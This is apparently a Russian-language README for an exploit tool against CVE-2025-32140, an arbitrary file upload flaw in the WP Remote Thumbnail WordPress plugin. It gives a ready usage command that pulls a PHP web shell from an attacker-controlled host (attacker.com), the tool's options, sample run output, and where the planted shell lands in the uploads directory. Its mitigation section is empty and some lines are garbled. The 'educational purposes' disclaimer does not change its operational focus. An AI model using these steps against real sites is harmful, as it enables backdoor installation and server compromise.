
Плагин WP Remote Thumbnail для WordPress версии <= 1.3.2 уязвим для произвольной загрузки файлов
CVE-2025-32140 — это критическая уязвимость в плагине WP Remote Thumbnail для WordPress. Она позволяет аутентифицированным атакующим (с правами автора или выше) загружать произвольные файлы, такие как веб-шеллы, используя ошибочную функцию, принимающую непроверенные URL.
Плагин не проверяет тип файла или содержимое, получаемое по предоставленному URL remote_thumb. Это позволяет атакующим сохранять вредоносные PHP-файлы (например, бэкдоры) в директорию /wp-content/uploads.
edit_post)Этот скрипт на Python автоматизирует эксплуатацию CVE-2025-32140, выполняя следующие шаги:
remote_thumb.python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
После эксплуатации загруженный веб-шелл, скорее всего, будет находиться по адресу:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
Замените YYYY/MM на текущий год и месяц загрузки.
Чтобы снизить риск эксплуатации этой уязвимости:
Этот скрипт предоставлен только в образовательных целях.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим эксплойтом.
Автор: Nxploited ( Khaled Alenazi ) 🌟
| Параметр | Алиас | Описание |
|---|
--url | -u | URL целевого сайта WordPress (например, http://target.com/wordpress) |
--username | -un | Имя пользователя WordPress с правами на редактирование записей |
--password | -p | Пароль для указанного пользователя |
--user_ID | -uid | ID пользователя WordPress (обычно 1 для администратора) |
--post_ID | -pid | ID редактируемой записи (может быть черновиком) |
--shell | Прямой URL к PHP-шеллу, размещённому на сервере атакующего |